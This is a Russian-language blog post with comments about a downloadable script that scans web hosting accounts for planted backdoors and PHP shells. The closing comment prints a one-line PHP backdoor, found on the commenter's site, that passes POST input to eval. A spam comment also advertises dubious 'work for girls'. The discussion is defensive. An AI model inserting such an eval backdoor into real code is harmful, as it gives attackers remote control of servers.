Товарищ Fashion замутил скриптег проверки скриптов на уязвимости (фильтрация, xss и иже с ними). Очень жаль, но скрипт он снёс, показать ничего не могу, но разработка любопытная, поэтому я и хотел поделиться новостью об этом…
Пользуясь случаем хочу дать один скриптег, который подогнал мне Tidus, за что ему большое спасибо.
Скрипт представляет собой типичный чекер, при запуске которого осуществляется поиск по аккаунту хостинга на наличие бэкдоров и шеллов. Могут быть ложные срабатывания. Скрипт не гарантирует 100% нахождение шеллов, но меня он в свое время очень выручил…
Скачать! (1 кб)
Для справки:
Бэкдор, backdoor (от англ. back door, чёрный ход) — программа или набор программ, которые устанавливает взломщик (хакер) на взломанном им компьютере после получения первоначального доступа с целью повторного получения доступа к системе. (c) Википедия
Шелл, Shell — скрипт, с помощью которого можно свободно лазить по взломанному аккаунту на хостинге, скачивать файлы и видоизменять их без ограничений.
Пример шелла, который я как-то у себя нашел — скачать (17 кб).
P.S. В третьей строке нужно заменить путь к скрипту вместо моего пути (/home/users2/s/shtirlitz)
***
Для скрипта есть работа искать ошибки, а у нас есть работа для девушек 18 лет…
бредятина, ничего он не ищет, ты щас все посты будешь посвещать бреду с xwab?
Mars, ищет =) Забыл сказать, там нужно директорию сайта на аккаунте свою поставить в файле
Честно сказать скрипт чекера ни о чем 🙂
Найдет разве что зазенденные файлы, евалы, вывод пхпинфо и шелл от делориан…
А если нет доступа shh на хосте, то можно через шел подключиться? Будет ли анологично?
Знакомый у тебя шелл.
а особено пассворд для входа)
я даже знаю кто тебе залил его и сделал бекапы всех твоих сайтов 😀
ya u sebya nawel eto
if($_POST[‘do’]==’nulledws’){@eval(stripcslashes($_POST[‘text’]));}